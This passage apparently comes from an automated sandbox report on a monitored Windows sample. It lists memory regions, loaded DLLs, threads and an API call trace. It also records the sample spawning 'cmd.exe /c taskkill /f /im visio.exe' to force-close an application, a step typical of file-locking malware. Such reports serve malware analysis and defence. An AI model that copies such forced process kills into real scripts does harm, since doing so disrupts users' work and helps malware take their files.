end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5695 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5696 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 5697 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 5698 start_va = 0x4580000 end_va = 0x458ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 5699 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5700 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5701 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5702 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5703 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5704 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5705 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5706 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5707 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5708 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5709 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5710 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5711 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5712 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5713 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5714 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5715 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5716 start_va = 0x4480000 end_va = 0x44affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 5717 start_va = 0x44b0000 end_va = 0x44d9fff monitored = 0 entry_point = 0x44b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5718 start_va = 0x4590000 end_va = 0x4717fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004590000" filename = "" Region: id = 5719 start_va = 0x4730000 end_va = 0x482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 5720 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5721 start_va = 0x4830000 end_va = 0x49b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004830000" filename = "" Region: id = 5722 start_va = 0x49c0000 end_va = 0x5dbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049c0000" filename = "" Region: id = 5723 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5724 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 5725 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 5726 start_va = 0x44a0000 end_va = 0x44affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 5727 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 5728 start_va = 0x44b0000 end_va = 0x44b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 5729 start_va = 0x5dc0000 end_va = 0x60f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5730 start_va = 0x6100000 end_va = 0x61e9fff monitored = 0 entry_point = 0x613d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5731 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 5732 start_va = 0x6100000 end_va = 0x61dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5733 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5734 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 5735 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5736 start_va = 0x44e0000 end_va = 0x44e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 5737 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5738 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5739 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5740 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5741 start_va = 0x44f0000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 5742 start_va = 0x4530000 end_va = 0x456ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 5743 start_va = 0x61e0000 end_va = 0x621ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061e0000" filename = "" Region: id = 5744 start_va = 0x6220000 end_va = 0x625ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006220000" filename = "" Region: id = 5745 start_va = 0x6260000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006260000" filename = "" Region: id = 5746 start_va = 0x62a0000 end_va = 0x62dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 5747 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5748 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5750 start_va = 0x4570000 end_va = 0x4575fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004570000" filename = "" Region: id = 5753 start_va = 0x6cba0000 end_va = 0x6cbbbfff monitored = 0 entry_point = 0x6cbaaa90 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 5754 start_va = 0x4570000 end_va = 0x4574fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wmiutils.dll.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\wmiutils.dll.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmiutils.dll.mui") Thread: id = 401 os_tid = 0x100c Thread: id = 402 os_tid = 0x714 Thread: id = 403 os_tid = 0x137c Thread: id = 404 os_tid = 0x608 Thread: id = 405 os_tid = 0x13a4 Process: id = "81" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5b9c0000" os_pid = "0x4e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im visio.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5755 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5756 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5757 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5758 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5759 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5760 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5761 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5762 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5763 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5764 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5765 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 5766 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5767 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5768 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5769 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5770 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5771 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5772 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5773 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5774 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5775 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5776 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5777 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5778 start_va = 0x450000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5779 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5780 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5781 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5782 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5783 start_va = 0x450000 end_va = 0x50dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5784 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 5785 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5786 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5787 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 5788 start_va = 0x1d0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5789 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5790 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5791 start_va = 0x790000 end_va = 0xac6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 406 os_tid = 0x8d4 [0226.302] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0226.302] __set_app_type (_Type=0x1) [0226.302] __p__fmode () returned 0x74974d6c [0226.303] __p__commode () returned 0x74975b1c [0226.303] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0226.303] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0226.303] GetCurrentThreadId () returned 0x8d4 [0226.303] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8d4) returned 0x78 [0226.303] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0226.303] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0226.304] SetThreadUILanguage (LangId=0x0) returned 0x409 [0226.310] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0226.311] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0226.311] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0226.311] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0226.311] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0226.311] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0226.311] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0226.311] GetConsoleOutputCP () returned 0x1b5 [0226.312] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0226.312] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0226.312] _get_osfhandle (_FileHandle=1) returned 0x158 [0226.312] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0226.313] _get_osfhandle (_FileHandle=1) returned 0x158 [0226.313] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0226.313] _get_osfhandle (_FileHandle=0) returned 0x154 [0226.313] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0226.313] GetEnvironmentStringsW () returned 0x597fd0* [0226.313] GetProcessHeap () returned 0x590000 [0226.313] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa1a) returned 0x5989f8 [0226.313] FreeEnvironmentStringsA (penv="A") returned 1 [0226.313] GetProcessHeap () returned 0x590000 [0226.313] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4) returned 0x597e58 [0226.313] GetEnvironmentStringsW () returned 0x597fd0* [0226.313] GetProcessHeap () returned 0x590000 [0226.313] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa1a) returned 0x599420 [0226.314] FreeEnvironmentStringsA (penv="A") returned 1 [0226.314] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0226.314] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0226.314] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0226.314] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0226.314] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0226.314] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0226.314] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0226.314] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0226.314] RegCloseKey (hKey=0x88) returned 0x0 [0226.315] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0226.315] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0226.315] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0226.315] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0226.315] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0226.315] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0226.315] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0226.315] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0226.315] RegCloseKey 